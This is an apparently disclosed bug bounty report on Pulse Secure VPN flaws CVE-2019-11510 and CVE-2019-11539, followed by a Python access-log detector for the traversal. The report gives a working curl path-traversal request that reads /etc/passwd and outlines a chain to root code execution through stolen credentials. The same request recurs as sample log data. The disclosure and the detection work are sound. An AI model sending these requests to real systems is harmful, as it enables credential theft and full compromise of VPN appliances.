Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████

Disclosed: 2021-07-29 19:49:31 By sp1d3rs To deptofdefense
Critical
Vulnerability Details
## Description

Hello. Some time ago, researcher Orange Tsai from the DEVCORE team gave a talk at DEF CON / Black Hat on the Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:

- **CVE-2019-11510 - Pre-auth Arbitrary File Reading**
- CVE-2019-11542 - Post-auth Stack Buffer Overflow
- **CVE-2019-11539 - Post-auth Command Injection**
- CVE-2019-11538 - Post-auth Arbitrary File Reading
- **CVE-2019-11508 - Post-auth Arbitrary File Writing**
- CVE-2019-11540 - Post-auth Session Hijacking

Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf

I discovered that the `https://██████████` instance is vulnerable to the described vulnerabilities.

## POC

Reading `/etc/passwd` via CVE-2019-11510:

```
curl -i -k --path-as-is https://██████████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
```

```
███████ █████████ ██████████ ████ █████ ██████ ███████ ████████ ███████
```

RCE can be achieved with this chain:

1. Pulse Secure stores credentials in cleartext.
2. The attacker reads the credentials and authenticates to the VPN.
3. The attacker exploits CVE-2019-11539 (Post-auth Command Injection), achieving RCE as root.

## Suggested fix

Update the Pulse Secure SSL VPN software.

## Impact

Remote code execution as root (by reading plaintext credentials and then exploiting CVE-2019-11539 - Post-auth Command Injection) and access to the intranet behind the VPN.

You can see an example report to Twitter by Orange Tsai here: https://hackerone.com/reports/591295
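The `--path-as-is` flag in the PoC matters because the traversal only exists in the request as sent: once the `..` segments are collapsed, the path is simply `/etc/passwd`. The following is an added detection example (not part of the report and not Pulse Secure code) that scans web-server access-log lines for exactly that kind of request: it decodes the raw request target, counts `..` segments before normalisation, checks for the `dana-na -> dana/html5acc/guacamole` pattern from CVE-2019-11510, and flags normalized paths that leave the `/dana` application tree. The log lines are constructed for the example, the combined-log regex is an assumption about the log format, and the assumption that legitimate application paths start with `/dana-na/` or `/dana/` is a heuristic for this example only.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Assumed "combined" access-log layout; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Constructed sample lines for this example; they are not real traffic.
# Line 1 mirrors the report's PoC request, line 2 is a benign login page hit,
# line 3 is the same traversal with the dots percent-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2019:03:14:07 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1893
203.0.113.7 - - [10/Aug/2019:03:14:09 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
198.51.100.4 - - [10/Aug/2019:03:15:22 +0000] "GET /dana-na/%2e%2e/dana/html5acc/guacamole/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1893
"""

# Heuristic for this example: legitimate application paths live under these prefixes.
ALLOWED_PREFIXES = ("/dana-na/", "/dana/")


def analyze_target(target: str) -> dict:
    """Inspect one request target and list the reasons it looks like traversal."""
    raw_path = urlsplit(target).path
    decoded = unquote(raw_path)  # %2e%2e -> ..
    # Count '..' segments in the request as sent: this is the only place the
    # traversal is visible, since normalisation collapses it.
    dotdot = sum(1 for seg in decoded.split("/") if seg == "..")
    normalized = normpath(decoded)
    reasons = []
    if dotdot:
        reasons.append(f"{dotdot} '..' segment(s) in raw path")
    if dotdot and "/dana/html5acc/guacamole/" in decoded:
        reasons.append("CVE-2019-11510 pattern: dana-na -> dana/html5acc/guacamole traversal")
    if not normalized.startswith(ALLOWED_PREFIXES):
        reasons.append(f"normalized path {normalized!r} leaves the application tree")
    return {"raw": raw_path, "normalized": normalized, "reasons": reasons}


def scan_log(text: str) -> list:
    """Return one finding per log line whose request target looks like traversal."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production scanner would count these
        result = analyze_target(m.group("target"))
        if result["reasons"]:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                **result,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} -> {f['normalized']}")
        for r in f["reasons"]:
            print("    -", r)
```

A 200 status on a flagged line is the signal that matters: a patched appliance rejects these requests, so a successful response to a traversal-shaped target is the indicator that the file read worked and that credential material should be considered exposed and rotated.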
Report Stats
  • Report ID: 695005
  • State: Closed
  • Substate: resolved
  • Upvotes: 36